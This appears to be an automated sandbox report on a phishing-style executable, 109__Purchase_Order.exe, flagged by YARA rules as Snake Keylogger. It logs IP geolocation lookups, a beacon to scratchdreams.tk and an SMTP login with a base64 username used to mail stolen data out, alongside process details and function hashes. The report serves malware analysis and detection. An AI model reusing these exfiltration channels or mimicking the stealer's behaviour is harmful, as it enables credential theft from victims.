Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:21:00 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-03 23:21:00 UTC	706	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:00 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 37041 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q9QIkrq%2B9iWWWpgtM0lSyjlpRqLN6cGpK2wWA9fsE6v7QO6X6QWA4bRcmmOVBiEDG9o0RgMvTlYem%2BcWaRUqNTjJJfpNfR1M2IOo0R4gpCFjoN9g8t%2BTavUUOY0VQ9ziPPBEGn0f"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86eccae3bfd38de8-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:21:00 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-03 23:21:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	172.67.177.134	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:21:01 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-03 23:21:01 UTC	710	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 37042 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ofO7RFfBO21JQIyCS6UnOhH7xlPwtWK52Rf%2FQdAo4VeYiMub5jn%2FoPp5CXkWWbjg0eyUpYU9fpBTxu2QEY8X2gKi%2Bz%2F6YeCrlp8cxkshRyCDY6q3VRZV0VprvCKSm%2F4otAm9TnU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86eccaea3bc667cf-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:21:01 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-03 23:21:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	172.67.177.134	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:21:02 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-03 23:21:02 UTC	712	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 37043 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNZJfRB4ZQm78x8kXr2XVp7OSc%2F%2BvfXvW4j0hNc%2BhTHAzq6pBF2vMSGDNbD2RXPchIqnaR%2F3InlXmHlMMaI3pth37aYIMeyBFfdfEFYt%2Fbm9IfPvFA%2BrgjY99nL7pNnm9LHRGs6S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86eccaf0c8604c04-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:21:02 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-03 23:21:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	172.67.177.134	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:21:03 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-03 23:21:03 UTC	708	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:03 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 37044 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuTKLCqXX1y1BvV6Xv0dDYe3xz8PXyuc%2FLBHhqCa3jewwqUiVeA3XVndXzLp50KVbcV2CraQNY8RvlZbvoMDCwQ7cOWebbumsrPEKqsZnU0O7wmvLL%2BR1%2FYBmRs0%2BtKiQy2ERJ0y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86eccaf75bee67b7-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:21:03 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-03 23:21:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	172.67.177.134	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:21:04 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-03 23:21:05 UTC	710	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:04 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 37045 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZYelCumYmDV%2BxH%2Bu62wWH0gvIBi47liTi0ZsBwk3sR1Dct%2B%2FfD8N89XVFykzFtvBahgxncceNjH8Rvzj0tcqlsELKtZa2zjzKgp%2BDmx8oIZr8UmqYhRPcSsNIluFs1RdZvyDR24"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86eccafdf8b15c76-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:21:05 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-03 23:21:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	172.67.177.134	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:21:05 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-03 23:21:06 UTC	704	IN	HTTP/1.1 200 OK Date: Wed, 03 Apr 2024 23:21:06 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 37047 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6UCYN2Mfuglgi6kPEH1jYvM7qaTdCBbJB0%2BM1ia6LCJ3T0S%2Ft7ulCrZzL0w2vo8Ox4kkyf2jQN94rzoDoKNXsBa4OCWTmM6TNkMJvKnHeHTRkKWDp0rpJaw0QiDiNLfFGFHMj3E"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86eccb048e0fb3dd-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:21:06 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-03 23:21:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	104.21.27.85	443	7532	C:\Users\user\Desktop\109__Purchase_Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-03 23:21:08 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-04-03 23:21:39 UTC	731	IN	HTTP/1.1 522 Date: Wed, 03 Apr 2024 23:21:39 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bi1FOMgdftNkSzsqtxP%2F865Y3YwyqVPIjkCqAvQVqFn3OZZVkFvzIZSX2vup3jUWNH6JvmWJeR4sZR5n4VpnNkiDof4M54LQTJKU3tKyQo8LwNf34b7qIzvFDp1EaYcMAuKv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 86eccb126a3102e0-MIA alt-svc: h3=":443"; ma=86400
2024-04-03 23:21:39 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 4, 2024 01:21:45.017853975 CEST	587	49757	208.91.199.225	192.168.2.4	220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 4, 2024 01:21:45.018009901 CEST	49757	587	192.168.2.4	208.91.199.225	EHLO 210979
Apr 4, 2024 01:21:45.213936090 CEST	587	49757	208.91.199.225	192.168.2.4	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Apr 4, 2024 01:21:45.214875937 CEST	49757	587	192.168.2.4	208.91.199.225	AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
Apr 4, 2024 01:21:45.414038897 CEST	587	49757	208.91.199.225	192.168.2.4	334 UGFzc3dvcmQ6
Apr 4, 2024 01:21:45.617820978 CEST	587	49757	208.91.199.225	192.168.2.4	235 2.7.0 Authentication successful
Apr 4, 2024 01:21:45.618011951 CEST	49757	587	192.168.2.4	208.91.199.225	MAIL FROM:<tslogs@mksiimst.com>
Apr 4, 2024 01:21:45.816104889 CEST	587	49757	208.91.199.225	192.168.2.4	250 2.1.0 Ok
Apr 4, 2024 01:21:45.816266060 CEST	49757	587	192.168.2.4	208.91.199.225	RCPT TO:<tslogs@mksiimst.com>
Apr 4, 2024 01:21:46.029256105 CEST	587	49757	208.91.199.225	192.168.2.4	550 5.4.6 <tslogs@mksiimst.com>: Recipient address rejected: Email Sending Quota Exceeded

Target ID:	0
Start time:	01:20:50
Start date:	04/04/2024
Path:	C:\Users\user\Desktop\109__Purchase_Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\109__Purchase_Order.exe"
Imagebase:	0xdc0000
File size:	518'656 bytes
MD5 hash:	4A14A9DEDD4DFE259949539090CCC9FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:20:56
Start date:	04/04/2024
Path:	C:\Users\user\Desktop\109__Purchase_Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\109__Purchase_Order.exe"
Imagebase:	0xda0000
File size:	518'656 bytes
MD5 hash:	4A14A9DEDD4DFE259949539090CCC9FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	217
Total number of Limit Nodes:	4

Executed Functions

Function 02FF3A88 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44cae1a7327f417ed029e46fc19b802dc280a6f13869ad12ad141f88dea5ca60
Instruction ID: 8f781ab946081dc9f963d7e63466601d3925103bdbfa118ab5da6ddfda7bc4df
Opcode Fuzzy Hash: 44cae1a7327f417ed029e46fc19b802dc280a6f13869ad12ad141f88dea5ca60
Instruction Fuzzy Hash: 10D1BC72B006848FEB65EF75C850B6EB7E7AF88780F1044AAD346DB2A0DB35D901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05BA6AC0 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b19e3afc3d7d0cc28198c0a70390f0f99942da28c24c9d8efce1194a60efe81
Instruction ID: 804931e952faea3327a148bfbc8948bfa3e5e3af032196bfed7500ca45e38958
Opcode Fuzzy Hash: 2b19e3afc3d7d0cc28198c0a70390f0f99942da28c24c9d8efce1194a60efe81
Instruction Fuzzy Hash: 6161C7B5E051199FDB04DFAAD5809AEFBF2FF88300F28D169D419A7355D730A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05BA6A9E Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 015ac923f4b598f5c593d0737eeba6cb6be48e632b9f71090b792570f22c88bf
Instruction ID: e230f666c51d0eda68b5d8ce507c90dc8cb0eda0fca341046a88b5ee209dd018
Opcode Fuzzy Hash: 015ac923f4b598f5c593d0737eeba6cb6be48e632b9f71090b792570f22c88bf
Instruction Fuzzy Hash: 79413C75E052198FDB05CFAAC94059EFBF2FF88300F18C16AD418AB355DB30A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02FF01CD Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02FF040E

Memory Dump Source

Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7d30357d43c1212376d53e1698eb8e4e4f300cc72b6cbdca206d77b537fa021a
Instruction ID: e4aa61ca2a368f6fd20763d0638bd6ec94ecd9c3d9b1418a68aaa931da6bce54
Opcode Fuzzy Hash: 7d30357d43c1212376d53e1698eb8e4e4f300cc72b6cbdca206d77b537fa021a
Instruction Fuzzy Hash: E7A17F71D00219CFDB60CFA8C940BEDBBB2BF48354F1481A9EA48A7255DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02FF01D8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02FF040E

Memory Dump Source

Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 75efc55d981bd560fab966e65dc18a15c02088bf7423613828f3143c6b853e46
Instruction ID: 714244a578a5af9bba0d9ead740c94eb66948b6f62e5cd3602bf03bb3ab1a9ff
Opcode Fuzzy Hash: 75efc55d981bd560fab966e65dc18a15c02088bf7423613828f3143c6b853e46
Instruction Fuzzy Hash: 6E917E71D00219CFDB60CFA8CD40BEEBBB2BF48354F1481A9EA48A7255DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02F7AE50 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02F7B0A6

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f58ca51334dbf2217bdde9af8e866a76baadf969bb42fe1db45445145981cd0d
Instruction ID: a9a7885d172154a4be2ee776dd6d5f99bd48c47e4e321c80a7fa512ee1af5c69
Opcode Fuzzy Hash: f58ca51334dbf2217bdde9af8e866a76baadf969bb42fe1db45445145981cd0d
Instruction Fuzzy Hash: 6F7145B0A00B058FD724DF2AD54079ABBF1FF88344F00892ED58AD7A50DB35E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02F7449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02F759D9

Memory Dump Source

Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 538fa5f9f6a3f2f98a34127a2ce0236ec7e68751e67493063f521a38bef77577
Instruction ID: 55451c1a9cc877cf48593e1c9216dfe728ad44c32feecf1718653bd70593b3a5
Opcode Fuzzy Hash: 538fa5f9f6a3f2f98a34127a2ce0236ec7e68751e67493063f521a38bef77577
Instruction Fuzzy Hash: 6041F2B0D00729CBDB24CFA9C884BCEBBF5BF49304F60806AD508AB255DB755949CF90

Uniqueness

Uniqueness Score: -1.00%

